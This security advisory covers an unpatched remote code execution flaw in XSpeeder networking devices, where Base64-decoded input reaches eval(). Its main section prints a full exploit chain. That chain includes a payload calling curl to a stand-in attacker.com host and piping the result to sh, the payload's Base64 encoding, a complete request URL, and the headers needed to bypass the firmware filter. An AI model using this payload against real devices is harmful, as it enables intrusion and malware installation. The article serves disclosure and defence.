Critical zero-day flaw reported in XSpeeder devices
Take action: If you are using XSpeeder devices, make sure they are isolated from the internet and accessible from trusted networks only. If a vendor continues to ignore this flaw, plan to replace that hardware because it will become increasingly less safe to use.
Learn More
A critical zero-day vulnerability is reported in XSpeeder networking hardware that exposes administrative passwords, internal network maps, user traffic logs, and device configuration files.
The flaw is tracked as CVE-2025-54322 (CVSS score 10.0), an unauthenticated Remote Code Execution (RCE) via the web management interface. Attackers can use this access to intercept data, install malware, or pivot into private networks connected to the compromised gear.
The web interface uses a Python-based backend that processes "check ID" parameters through a Base64-decoding routine. The decoded data is passed directly into a high-risk eval() function, which executes the input as live system code. The firmware attempts to use a "GateKeeper" middleware to filter requests based on time-synchronized headers and simple keyword scans.
The attacker crafts a command that uses Python's __import__ to reach the operating system. To bypass the firmware's "GateKeeper" check (which looks for sUserCode and sPwd), they append those strings as a comment.
__import__('os').system('curl http://attacker.com/malware | sh') #sUserCode sPwd
This raw string is then encoded into Base64 to be passed through the chkid URL parameter:
X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2N1cmwgaHR0cDovL2F0dGFja2VyLmNvbS9tYWx3YXJlIHwgc2gnKSAjc1VzZXJDb2RlIHNQd2Q=
To successfully trigger the RCE, the request must include exactly three parameters to pass the len(hData) == 3 check observed in the firmware.
https://[TARGET_IP]/?title=any&oIp=any&chkid=X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2N1cmwgaHR0cDovL2F0dGFja2VyLmNvbS9tYWx3YXJlIHwgc2gnKSAjc1VzZXJDb2RlIHNQd2Q=
For this string to work in a real-world scenario, the request must also include the specific headers identified in the research:
- User-Agent: Must contain
SXZ. - X-SXZ-R: A dynamic header based on the current minute (
time.time()/60 % 7). - Cookie: A valid
sessionidobtained from the/webInfos/endpoint.
Security researchers discovered the flaw and attempted to notify the vendor. However, the manufacturer has ignored all alerts, so there is no patch available.
Because the vulnerability exists in the web management interface, any device exposed to the public internet is at risk. Public scanning tools like Shodan show that approximately 70,000 devices are exposed, the majority of them in residential and small business environments.
Since the vendor has not acknowledged the report, researchers believe the flaw will remain unpatched for the foreseeable future.
Security analysts recommend that owners of XSpeeder equipment immediately disable remote management features. If the device is not essential, users should replace it with hardware from a vendor that actively maintains its firmware.
